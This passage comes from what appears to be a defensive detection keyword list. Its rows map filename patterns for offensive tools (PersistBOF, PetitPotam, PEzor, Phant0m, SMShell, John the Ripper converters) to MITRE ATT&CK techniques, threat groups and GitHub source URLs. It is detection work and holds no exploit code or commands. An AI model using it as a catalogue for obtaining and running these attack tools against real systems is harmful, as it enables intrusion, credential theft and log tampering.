modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PersistenceBOF.c*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*PersistenceBOF.exe*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*persistent-security/SMShell*,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,1,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*persist-ice-junction.o*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*persist-ice-monitor.o*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*persist-ice-shortcut.o*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*persist-ice-time.o*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*persist-ice-xll.o*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*PersStartup.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*PEScrambler.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z 
-*PetitPotam.cna*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*PetitPotam.cpp*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*PetitPotam.exe*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*PetitPotam.exe*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*PetitPotam.ps1*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*petitpotam.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation 
tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*petitpotam.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*PetitPotam.py*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*PetitPotam.sln*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*PetitPotam.sln*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*PetitPotam.vcxproj*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*petitpotam_check*,offensive_tool_keyword,linWinPwn,linWinPwn is 
a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*PetitPotamModified.exe*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*PEzor generated Beacon Object File*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*PEzor*/Inject.c*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*Pezor*inject.hpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda 
- Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*PEzor.sh -*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*PEzor.sh *.bin*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*PEzor/*/bof.cpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*PEzor/*syscalls.hpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*pfsense*reverse_root_shell_csrf/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*pfx2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pgfpignfckbloagkfnamnolkeaecfgfh*,greyware_tool_keyword,Free Proxy VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*pgpdisk2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pgpsda2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pgpwde2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Phant0m scm 1*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,0,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*Phant0m scm 2*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,0,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*Phant0m wmi*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,0,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*phant0m.cna*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*Phant0m_cobaltstrike*,offensive_tool_keyword,cobaltstrike,Aggressor script to integrate Phant0m with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 
